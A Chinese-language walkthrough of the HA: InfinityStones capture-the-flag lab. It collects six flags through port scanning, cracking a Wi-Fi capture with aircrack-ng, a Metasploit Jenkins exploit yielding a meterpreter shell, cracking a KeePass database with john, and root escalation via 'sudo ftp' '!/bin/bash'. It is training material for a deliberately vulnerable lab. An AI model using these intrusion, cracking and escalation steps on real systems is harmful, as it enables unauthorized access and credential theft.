HA: InfinityStones靶机渗透测试
文章目錄
- 靶機信息
- 一、信息收集
- 1.主機發現
- 2.端口掃描
- 3.目錄掃描
- 二、漏洞挖掘
- 1.訪問 192.168.1.108
- 2.訪問 /img 目錄
- 3.訪問 https 服務(443)端口
- 4.查看 /wifi/ 路徑
- 5.訪問 /aether.php 頁面
- 6.訪問 8080 端口
- 7.ssh 登陸 morag 賬戶
靶機信息
滅霸認為,如果他殺死了宇宙中所有生命的一半,將恢復平衡。
為此,他需要所有六塊無限寶石來驅動無限手套,這反過來又使他能夠彎曲時間,空間,能量以及物理和現實定律。
但是這次復仇者聯盟比滅霸領先一步。
復仇者聯盟在這個CTF中隱藏了所有無限寶石。
幫助滅霸獲得所有無限寶石并恢復宇宙的平衡。該機器包含6種帶有6種不同標志的無限寶石來測試您的技能,找出它們。
簡單來說就是有6個flag,拿到它
一、信息收集
1.主機發現
arp-scan -l
2.端口掃描
nmap -A -p- 192.168.1.108
發現開放了 22 ssh 服務;80 apache;443 ssl;8080 jetty 框架
3.目錄掃描
dirb http://192.168.1.108
發現三個目錄
二、漏洞挖掘
1.訪問 192.168.1.108
訪問主頁發現寶石圖片切換及靶機信息和復聯任務圖片
2.訪問 /img 目錄
將圖片保存到電腦,查看信息
exiftool space.jpg
得到 SPACESTONE
SPACESTONE:{74E57403424607145B9B77809DEB49D0}
3.訪問 https 服務(443)端口
https://192.168.1.108/
查看證書
查看更多信息
得到 MINDSTONE
MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
4.查看 /wifi/ 路徑
發現兩個文件,下載文件并查看
發現流量文件是 wifi 數據包,
發現 pwd.txt 文件是密碼構成:
gam 開頭
一個大寫字母
2個數字
2個小寫字母
復聯第一次上映年份(這里影院寫成了威脅)
1)生成字典
crunch 12 12 -t gam,%%@@2012 -o dict.txt
2)查找 wifi-key
aircrack-ng -w ./dict.txt /root/Downloads/reality.cap
發現密碼是 gamA00fe2012
3)訪問 http://192.168.1.108/gamA00fe2012/
得到 REALITYSTONE
REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
5.訪問 /aether.php 頁面
發現 8 個問題,正確解答并轉為二進制得到 01101001
1)訪問 /01101001/ 路徑
http://192.168.1.108/01101001/
發現 hints.txt,查看發現是 Brainfuck 編碼
在 https://www.splitbrain.org/services/ook 解碼得到 admin:avengers
6.訪問 8080 端口
發現 jenkins 框架
1)使用 msfconsole 對其進行滲透
msfconsole
search jenkins
use 11
set target 1 #設置目標系統類型
show payloads #查看可用payload
set payload 14 #選擇對應payload
set rhosts 192.168.1.108 #設置靶機ip
set rport 8080 #設置端口
set targeturi / #設置路徑
set username admin #設置用戶名
set password avengers #設置密碼
run #開始利用
得到 meterpreter shell
2)get 新 shell
shell
3)嘗試 suid 提權
find / -perm -u=s -type f 2>/dev/null
發現 /opt/script 文件
4)使用 python3 get 交互 shell,查看所有用戶,執行 script
python3 -c "import pty;pty.spawn('/bin/bash')"
/opt/script
發現 morag、stones 賬戶
得到 TIMESTONE
TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}
5)查看 /opt/ 目錄下所有文件
cd /opt
ls
發現 morag.kdbx 文件
6)使用 meterpreter shell 獲取文件
meterpreter > download /opt/mor*
7)執行 morag.kdbx
apt-get install keepassx #安裝keepassx
keepassx ./morag.kdbx
執行發現需要密碼
8)破解密碼
keepass2john morag.kdbx > morag.hash
john morag.hash
得到密碼 princesa,輸入
打開后發現有 flag 字樣,雙擊右邊的 power stone 查看其值
得到 POWERSTONE
POWERSTONE:{EDDF140F156862C9B494C0B767DCD412}
打開 creds 列,發現疑似 base64 代碼,嘗試解密
echo 'bW9yYWc6eW9uZHU=' | base64 -d
發現是 morag 賬戶的密碼
7.ssh 登陸 morag 賬戶
因為我們已知靶機開放了 ssh 所以我們直接登陸即可
ssh morag@192.168.1.108
yondu
接著常規操作 sudo 提權
sudo -l
sudo ftp
!/bin/bash # !表示在ftp中執行系統命令并返回
cd /root
cat f*
得到 SOULSTONE
SOULSTONE:{56F06B4DAC14CE346998483989ABFF16}
至此,六個 flag 全部集齊
總結
以上是生活随笔為你收集整理的HA: InfinityStones靶机渗透测试的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: HA: Forensics靶机渗透测试
- 下一篇: kali安装vscode和无法启动解决方